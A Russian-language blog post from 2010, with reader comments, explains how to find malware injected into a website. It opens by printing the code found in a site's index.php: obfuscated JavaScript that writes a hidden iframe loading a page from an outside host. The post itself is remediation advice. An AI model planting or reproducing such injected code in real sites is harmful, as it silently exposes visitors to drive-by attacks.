Как найти вирус на сайте

Декабрь, 25th 2010Рубрика: Web | Безопасность 11915
Подписаться на комментарии по RSS

Вирусный код с сайта:

<script language=JavaScript>
jhtm='%3Ciframe%20src%3D%22http%3A//inanalitics.in/inc/top/iframe.php%22
%20width%3D1%20height%3D1%20style%3D%22visibility%3A%20hidden%22%3E%3C
/iframe%3E';crypo=unescape(jhtm);document.write(crypo);
</script>

Не так давно меня попросили разобраться с одним сайтом. Яндекс пометил его как распростаняющий вирусы, о чем выдавал информацию сразу после ссылки на сайт, да и антивирусы, способные фильтровать интернет-трафик, также ругаются на такие сайты.

Действительно, вирусы, написанные для сайтов, набирают популярность. Но надо понимать, что большинстве случаев, сам вирус находится на компьютере, имеющем ftp доступ к сайту. Принцип действия примерно следующий - вирус незаметно для пользователя крадёт пароли от ftp, подключается и вставляет в скрипты сайта паразитный код.

Для начала необходимо вылечить заражённый компьютер. Только после этого можно подключаться к удаленному серверу по FTP или SSH и начинать поиски файлов, заражённых вирусом. Для небольших проектов можно скачать весь сайт на локальный компьютер и осуществить поиск получится быстрее. Хотя это далеко не лучший вариант (особенно повезет владельцам сайтов на битриксе, в виду ОГРОМНОГО количества файлов этой кривой системы).

Что искать? Где искать? Это наверное два главных вопроса.

На первый вопрос отвечаю, что искать следует подозрительные строки в тексте, где встречается слово iframe, причем поиск начинать прежде всего с файлов index.html, index.php. Далее по всем .php и .html файлам.

Ну а найденное мной конкретно в описанном случае, вы увидели в самом начале этой статьи. Данный код находился в самом начале файла index.php в корневой директории сайта.

Подписывайтесь на канал Яндекс.Дзен и узнавайте первыми о новых материалах, опубликованных на сайте.

Если считаете статью полезной,
не ленитесь ставить лайки и делиться с друзьями.

Комментариев: 5

  1. 2011-01-02 в 20:19:30 | Yozh007]]>avatar]]>

    Первый отрицательный отзыв про битрикс нашел! Где то в тексте. Неужели с ним всё так плохо?

  2. 2011-01-04 в 00:39:03 | dre@mer]]>avatar]]>

    Мне хватило разработки одного шаблона для битрикса, для понимания того, что из недр 1С ничего путного ещё не выходило. Ну и переезд на другой хостинг с этой системой тоже очень порадовал.

  3. 2011-01-04 в 16:44:17 | Yozh007]]>avatar]]>

    Наверное, я сам попробую, посмотрю что за цмс. Был интерес, но всё как то руки не доходят....

  4. 2011-09-23 в 02:15:45 | ushi

    Я нашел спсоб, как найти вирус на сайте. Достаточно иметь при себе тотал коммандер и чуточку терпения:)

    Мою статью «Как найти и удалить вирус с сайта wordpress. Антивирус wordpress» можно прочесть здесь:http://blogalt.ru/wordpress/antiviruswordpress.html

  5. 2019-01-18 в 18:25:22 | Антон

    Попробуйте поискать онлайн сканерами уязвимости чтобы найти вирусы. Например это acunetix.com или metascan.ru, отличные утилиты

ваш комментарий будет опубликован после проверки
на указанный адрес будет отправлено письмо с кодом активации. Вы можете настроить собственный профиль и стать активным участником или автором.